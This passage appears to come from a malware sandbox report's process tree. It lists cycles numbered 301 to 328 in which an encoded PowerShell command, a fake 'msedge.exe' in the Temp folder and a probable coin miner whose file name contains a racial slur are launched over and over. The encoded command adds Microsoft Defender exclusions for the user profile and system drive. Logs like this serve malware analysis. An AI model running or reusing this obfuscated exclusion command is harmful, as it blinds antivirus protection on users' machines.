        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        301⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        301⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        301⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        302⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        302⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        302⤵
        
        PID:2824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        303⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        303⤵
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        303⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        304⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        304⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        304⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        305⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        305⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        305⤵
        
        PID:584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        306⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        306⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        306⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        307⤵
        
        PID:1340
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        307⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        307⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        308⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        308⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        308⤵
        
        PID:804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        309⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        309⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        309⤵
        
        PID:3280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        310⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        310⤵
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        310⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        311⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        311⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        311⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        312⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        312⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        312⤵
        
        PID:3576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        313⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        313⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        313⤵
        
        PID:2740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        314⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        314⤵
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        314⤵
        
        PID:3608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        315⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        315⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        315⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        316⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        316⤵
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        316⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        317⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        317⤵
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        317⤵
        
        PID:2688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        318⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        318⤵
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        318⤵
        
        PID:916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        319⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        319⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        319⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        320⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        320⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        320⤵
        
        PID:3704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        321⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        321⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        321⤵
        
        PID:332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        322⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        322⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        322⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        323⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        323⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        323⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        324⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        324⤵
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        324⤵
        
        PID:2108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        325⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        325⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        325⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        326⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        326⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        326⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        327⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        327⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        327⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        328⤵
        
        PID:3980
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        328⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        328⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
